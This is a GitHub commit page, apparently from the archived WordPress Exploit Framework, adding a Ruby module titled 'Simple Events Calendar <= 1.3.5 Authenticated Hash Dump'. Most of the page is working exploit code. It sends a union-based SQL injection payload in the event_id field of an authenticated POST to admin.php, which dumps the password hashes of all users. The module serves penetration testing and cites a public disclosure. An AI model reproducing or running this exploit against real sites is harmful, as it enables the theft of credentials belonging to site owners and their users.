Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit 8830859

Browse files
committed
Add Simple Events Calendar <= 1.3.5 hash dump
1 parent e351327 commit 8830859

File tree

1 file changed

+69
-0
lines changed

1 file changed

+69
-0
lines changed
Lines changed: 69 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,69 @@
1+
# frozen_string_literal: true
2+
3+
class Wpxf::Auxiliary::SimpleEventsCalendarHashDump < Wpxf::Module
4+
include Wpxf::WordPress::HashDump
5+
6+
def initialize
7+
super
8+
9+
update_info(
10+
name: 'Simple Events Calendar <= 1.3.5 Authenticated Hash Dump',
11+
desc: %(
12+
Simple Events Calendar <= 1.3.5 contains an SQL injection vulnerability
13+
which can be leveraged by all registered users with the permission
14+
to manage events. This module utilises this vulnerability
15+
to dump the hashed passwords of all users in the database.
16+
),
17+
author: [
18+
'Lenon Leite', # Disclosure
19+
'Rob Carr <rob[at]rastating.com>' # WPXF module
20+
],
21+
references: [
22+
['WPVDB', '8955'],
23+
['URL', 'http://lenonleite.com.br/en/blog/2017/11/03/simple-events-calendar-1-3-5-wordpress-plugin-sql-injection/']
24+
],
25+
date: 'Nov 03 2017'
26+
)
27+
end
28+
29+
def check
30+
check_plugin_version_from_readme('simple-events-calendar', '1.3.6')
31+
end
32+
33+
def requires_authentication
34+
true
35+
end
36+
37+
def reveals_one_row_per_request
38+
true
39+
end
40+
41+
def hashdump_request_method
42+
:post
43+
end
44+
45+
def hashdump_request_params
46+
{
47+
'page' => 'simple-events'
48+
}
49+
end
50+
51+
def hashdump_request_body
52+
{
53+
'edit' => '1',
54+
'event_id' => "-#{Utility::Text.rand_numeric(2)} union #{hashdump_sql_statement} #"
55+
}
56+
end
57+
58+
def hashdump_visible_field_index
59+
3
60+
end
61+
62+
def hashdump_number_of_cols
63+
9
64+
end
65+
66+
def vulnerable_url
67+
normalize_uri(wordpress_url_admin, 'admin.php')
68+
end
69+
end

0 commit comments

Comments
 (0)